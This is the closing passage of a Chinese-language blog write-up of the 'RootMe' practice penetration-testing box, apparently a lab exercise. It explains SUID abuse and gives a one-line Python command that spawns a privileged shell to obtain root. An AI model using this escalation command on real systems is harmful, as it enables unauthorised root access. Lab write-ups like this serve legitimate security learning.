<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>其中的python可以为我们所用（详见suid提权）</p>
<blockquote>
<p>如果二进制文件设置了 SUID 位，则它不会删除提升的权限，并且可能会被滥用来访问文件系统、升级或将特权访问作为 SUID 后门进行维护。如果它用于运行 <code>sh -p</code> ，则在 Debian （&lt;&#x3D; Stretch） 等允许默认 <code>sh</code> shell 以 SUID 权限运行的系统上省略该 <code>-p</code> 参数。</p>
</blockquote>
<ol start="3">
<li>得到root并打印root.txt。<br>运行<code>./python -c &#39;import os; os.execl(&quot;/bin/sh&quot;, &quot;sh&quot;, &quot;-p&quot;)&#39;</code>，成功得到root！<br><img src="/PenTest_FILE/24b3a95e690277794077ea2628edb220_MD5.jpeg"></li>
</ol>

	  <div class="article-footer-copyright">

    本博客采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.</a>
</div>

	</div>

	
	<span id="/2023/12/11/RootMe/" class="leancloud-visitors view" data-flag-title="RootMe">
		<em class="post-meta-item-text"> Page View </em> <i class="leancloud-visitors-count"></i>
	</span>
	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="/2023/12/11/DASCTF X 0psu3 2023十一月挑战赛/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2023/12/02/2023-线上-河南金盾信安杯/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
		<section id="comments" class="comments">
			<style>
			.comments{margin:30px;padding:10px;background:rgb(0, 0, 0)}
			@media screen and (max-width:800px){.comments{margin:auto;padding:10px;background:#000}}
			</style>
			<div id="vcomment" class="comment"></div>
<script src='//unpkg.com/valine/dist/Valine.min.js'></script>
<script src="https://cdnjs.loli.net/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script>
var valineConfig = {"enable":true,"appId":"QrmzEeS3e4xvmJxO1dSPlkW4-gzGzoHsz","appKey":"ov6uvwKnDQmJxtpeS0wvBIwL","placeholder":"","visitor":true,"avatar":"monsterid","requiredFields":["nick","mail"],"pageView":true}
valineConfig.el='#vcomment';
new Valine(valineConfig);
    // new Valine({
    //     el: '#vcomment',
    //     appId: "",
    //     appKey: "",
    //     placeholder: "",
    //     avatar:"monsterid",
    //     visitor: "true",
    //     requiredFields: "nick,mail".split(','),
    // });
</script>

		</section>
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2023-12-11 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/进攻性渗透测试/">进攻性渗透测试<span>4</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/渗透打靶/">渗透打靶<span>2</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#%E4%BE%A6%E5%AF%9F"><span class="toc-article-text">侦察</span></a></li><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#%E8%8E%B7%E5%8F%96shell"><span class="toc-article-text">获取shell</span></a></li><li class="toc-article-item toc-article-level-1"><a class="toc-article-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-article-text">权限提升</span></a></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2024 X1NRI's Blog
  
      powered by <a href="http://hexo.io/" target="_blank">Hexo</a>.Theme <a href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>  
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
